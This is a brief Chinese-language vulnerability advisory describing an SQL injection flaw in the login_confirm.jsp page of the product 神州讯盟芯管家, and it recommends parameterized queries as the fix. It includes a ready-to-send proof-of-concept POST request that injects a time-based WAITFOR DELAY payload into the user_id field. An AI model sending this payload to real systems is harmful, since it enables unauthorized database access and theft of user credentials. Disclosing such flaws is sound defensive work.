漏洞描述
神州讯盟芯管家 login_confirm.jsp文件存在SQL注入漏洞,攻击者可通过构造恶意输入(如特殊字符或SQL语句)绕过身份验证,直接访问数据库,可能导致敏感信息泄露(如用户账号、密码)、数据篡改或服务器被控制。该漏洞源于未对用户提交的参数(如用户名、密码字段)进行严格的过滤或预编译处理,建议尽快修复,采用参数化查询或ORM框架以增强安全性。
POST /login_confirm.jsp HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
user_id=1%27;WAITFOR+DELAY+%270:0:5%27--&sn=8&macadress=&wm_types=%C4%A3%CC%AC%B4%B0%BF%DA&url=%2FSunmoIC%2F698D51A19D8A121CE581499D7B701668.jsp&url2=%2FSunmoIC%2F698D51A19D8A121CE581499D7B701668.jsp&password=admin&version=%D6%D0%CE%C4